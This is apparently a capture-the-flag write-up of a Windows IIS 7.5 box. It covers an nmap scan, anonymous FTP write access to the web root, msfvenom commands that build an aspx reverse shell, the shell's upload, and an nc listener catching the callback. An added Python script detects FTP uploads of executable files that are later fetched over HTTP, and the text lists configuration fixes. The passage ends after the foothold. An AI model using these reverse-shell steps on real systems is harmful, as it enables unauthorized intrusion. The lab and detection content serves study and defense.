```
└──╼ [★]$ nmap -sV --script vuln 10.129.153.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 06:29 CDT
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 06:33 (0:00:01 remaining)
Nmap scan report for 10.129.153.100
Host is up (0.077s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
| vulners:
|   cpe:/a:microsoft:internet_information_services:7.5:
|       PACKETSTORM:180580      10.0    https://vulners.com/packetstorm/PACKETSTORM:180580      *EXPLOIT*
|       MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF-       10.0    https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-FTP-IIS75_FTPD_IAC_BOF-       *EXPLOIT*
|       CVE-2010-3972   10.0    https://vulners.com/cve/CVE-2010-3972
|       SSV:20122       9.3     https://vulners.com/seebug/SSV:20122    *EXPLOIT*
|       CVE-2010-2730   9.3     https://vulners.com/cve/CVE-2010-2730
|       SSV:20121       4.3     https://vulners.com/seebug/SSV:20121    *EXPLOIT*
|       PACKETSTORM:180584      4.3     https://vulners.com/packetstorm/PACKETSTORM:180584      *EXPLOIT*
|       MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS-    4.3     https://vulners.com/metasploit/MSF:AUXILIARY-DOS-WINDOWS-HTTP-MS10_065_II6_ASP_DOS-    *EXPLOIT*
|       CVE-2010-1899   4.3     https://vulners.com/cve/CVE-2010-1899
|       EDB-ID:15803    0.0     https://vulners.com/exploitdb/EDB-ID:15803      *EXPLOIT*
|_      EDB-ID:15167    0.0     https://vulners.com/exploitdb/EDB-ID:15167      *EXPLOIT*
|_http-server-header: Microsoft-IIS/7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.50 seconds
```
FTP is open, and logging in as anonymous shows the following:
```
ftp> ftp 10.129.153.100
Connected to 10.129.153.100.
220 Microsoft FTP Service
Name (10.129.153.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
```
In the browser we see the following page:
This shows that the FTP and HTTP servers share the same root directory. That is a serious problem: anything uploaded over anonymous FTP can then be requested over HTTP, so a file the web server executes (for example a reverse shell) can be uploaded and triggered. Here we use msfvenom, the payload generator from the Metasploit framework. The command below shows that aspx is a supported output format. The FTP listing also tells us what is running: the directory name aspnet_client is something ASP.NET creates, and iisstart.htm is the standard IIS (Internet Information Services) start page, so the host is running a Microsoft IIS web server. Based on that, we generate the reverse shell as aspx.
```
└──╼ [★]$ msfvenom -p windows/x64/shell/reverse_tcp -f aspx lhost=tun0 lport=4444 rhost=10.129.151.61 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3675 bytes
Saved as: rshell.aspx
```
```
ftp> ftp 10.129.151.61
Connected to 10.129.151.61.
220 Microsoft FTP Service
Name (10.129.151.61:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put rshell.aspx
local: rshell.aspx remote: rshell.aspx
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************|  3722       59.15 MiB/s    --:-- ETA
226 Transfer complete.
3722 bytes sent in 00:00 (13.98 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
10-28-24  01:39PM                 3722 rshell.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp>
```
It turned out that the payload above did not work; I switched to the one below and it succeeded:
```
└──╼ [★]$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.63 LPORT=4444 -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2719 bytes
Saved as: rshell.aspx
```
Then requesting the file in the browser triggers the reverse shell:
```
└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.63] from (UNKNOWN) [10.129.151.61] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>
```
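That upload-then-request sequence (a STOR over anonymous FTP followed by an HTTP GET of the same path) is exactly what a defender should be watching for in the IIS logs. The following Python script is an added example, not part of this writeup: it parses IIS W3C-format FTP and web logs, flags any upload of a server-executable extension, and pairs each upload with the first HTTP request for the same path. The log lines are constructed for the example, and the field lists in their #Fields headers are assumptions (IIS lets you choose which fields are logged, so the parser reads the header instead of relying on column positions).

```python
"""Added defender-side example (not part of the original writeup): correlate
FTP uploads of server-executable files with later HTTP requests for the same
path, using IIS W3C-format logs.  Sample log lines are constructed; the
#Fields lists are assumed and may differ from a given server's configuration."""
import os
from datetime import datetime, timedelta

# Extensions that IIS hands to an ASP/ASP.NET handler instead of serving as
# static content.  web.config is included because it can change handler
# mappings for the whole directory.
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".ascx", ".config"}

# Constructed IIS FTP log (W3C extended format).  STOR is the upload command.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2024-10-28 13:38:51 10.10.14.63 anonymous 10.129.151.61 21 USER anonymous 331 0
2024-10-28 13:38:52 10.10.14.63 anonymous 10.129.151.61 21 PASS *** 230 0
2024-10-28 13:39:02 10.10.14.63 anonymous 10.129.151.61 21 STOR /rshell.aspx 226 0
2024-10-28 13:39:40 10.10.14.63 anonymous 10.129.151.61 21 STOR /notes.txt 226 0
2024-10-28 13:41:10 10.10.14.9 alice 10.129.151.61 21 STOR /report.aspx 226 0
"""

# Constructed IIS web log for the site that shares the FTP root.
HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-10-28 13:39:30 10.129.151.61 GET /rshell.aspx - 80 - 10.10.14.63 200
2024-10-28 13:39:45 10.129.151.61 GET /iisstart.htm - 80 - 10.10.14.9 200
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields line.
    IIS encodes spaces in URIs as '+', so splitting on whitespace is safe."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log record before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"field count mismatch: {line!r}")
        yield dict(zip(fields, values))


def _timestamp(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def find_upload_then_request(ftp_text, http_text, window=timedelta(hours=1)):
    """Return one alert per FTP upload of an executable file.  Each alert
    carries the first HTTP request for the same path within the window, if
    any.  Paths are compared as-is, which assumes the FTP root and the web
    root coincide (the situation in the writeup); map prefixes otherwise."""
    uploads = [
        r for r in parse_w3c(ftp_text)
        if r["cs-method"] == "STOR"
        and os.path.splitext(r["cs-uri-stem"].lower())[1] in EXECUTABLE_EXT
    ]
    requests = sorted(parse_w3c(http_text), key=_timestamp)
    alerts = []
    for up in uploads:
        uploaded = _timestamp(up)
        path = up["cs-uri-stem"].lower()
        hit = next(
            (h for h in requests
             if h["cs-uri-stem"].lower() == path
             and uploaded <= _timestamp(h) <= uploaded + window),
            None,
        )
        anonymous = up["cs-username"].lower() == "anonymous"
        alerts.append({
            "path": up["cs-uri-stem"],
            "ftp_user": up["cs-username"],
            "uploader_ip": up["c-ip"],
            "uploaded_at": uploaded.isoformat(sep=" "),
            "requested_at": _timestamp(hit).isoformat(sep=" ") if hit else None,
            "requester_ip": hit["c-ip"] if hit else None,
            # An anonymous upload, or any follow-up request, means the file is
            # most likely in use as a web shell; an authenticated upload that
            # nobody has requested yet still deserves a look, at lower priority.
            "severity": "high" if anonymous or hit else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_request(FTP_LOG, HTTP_LOG):
        print(alert)
```

On the constructed logs this produces two alerts: rshell.aspx, uploaded anonymously and fetched 28 seconds later from the same address (high), and report.aspx, uploaded by an authenticated user and never requested (medium); notes.txt is ignored because IIS would serve it as static content. The real fix is configuration, not detection: give the FTP site its own physical path outside any web root, disable anonymous write access, and remove the ASP.NET handler mappings from any directory that must accept uploads.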
After getting in, it turned out that this account did not even have permission to read the user flag, and I also noticed the server is x86, which is why the first payload did not work: